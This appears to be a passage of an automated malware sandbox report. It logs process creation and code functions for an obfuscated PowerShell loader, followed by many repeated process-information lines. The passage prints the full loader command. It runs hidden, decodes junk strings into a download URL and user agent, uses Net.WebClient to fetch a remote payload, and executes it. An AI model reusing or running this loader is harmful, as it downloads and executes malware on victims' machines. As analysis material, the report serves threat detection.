SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp]
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaVJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A756B push ebx; iretd 2_2_00007FFD9B8A756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A74FB push ebx; iretd 2_2_00007FFD9B8A756A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04BBE3B0 push eax; retf 5_2_04BBE3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04BBFE08 push esp; retf 5_2_04BBFE09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04BB3A9D push ebx; retf 5_2_04BB3ADA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04BB3AED push ebx; retf 5_2_04BB3ADA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07AA08C2 push eax; mov dword ptr [esp], ecx5_2_07AA0AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07AA0AB9 push eax; mov dword ptr [esp], ecx5_2_07AA0AC4
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
